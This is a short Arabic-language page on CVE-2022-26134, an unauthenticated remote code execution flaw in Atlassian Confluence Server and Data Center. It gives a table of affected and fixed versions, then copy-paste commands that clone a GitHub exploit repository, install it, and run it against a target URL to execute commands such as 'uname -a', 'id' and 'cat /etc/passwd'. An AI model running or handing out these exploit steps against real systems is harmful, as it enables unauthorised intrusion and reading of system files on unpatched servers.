
Atlassian Confluence (CVE-2022-26134) - تنفيذ تعليمات برمجية عن بُعد دون مصادقة (RCE)
Confluence Server وData Center - CVE-2022-26134 - ثغرة حرجة لتنفيذ تعليمات برمجية عن بُعد دون مصادقة
| الملخص | CVE-2022-26134 - ثغرة حرجة لتنفيذ تعليمات برمجية عن بُعد دون مصادقة في Confluence Server وData Center |
|---|---|
| المنتجات المتأثرة | Confluence Confluence Server Confluence Data Center |
| الإصدارات المتأثرة | جميع الإصدارات المدعومة من Confluence Server وData Center متأثرة. الإصدارات الأحدث من 1.3.0 من Confluence Server وData Center متأثرة. |
| الإصدارات المُصلحة | 7.4.17 7.13.7 7.14.3 7.15.2 7.16.4 7.17.4 7.18.1 |
انسخ والصق في الطرفية:
git clone https://github.com/nxtexploit/CVE-2022-26134 ; cd CVE-2022-26134 ; pip install -r requirements.txt
python3 CVE-2022-26134.py https://target.com type-command-here
python3 CVE-2022-26134.py https://target.com "uname -a"
python3 CVE-2022-26134.py https://target.com "cat /etc/passwd"
python3 CVE-2022-26134.py https://target.com id
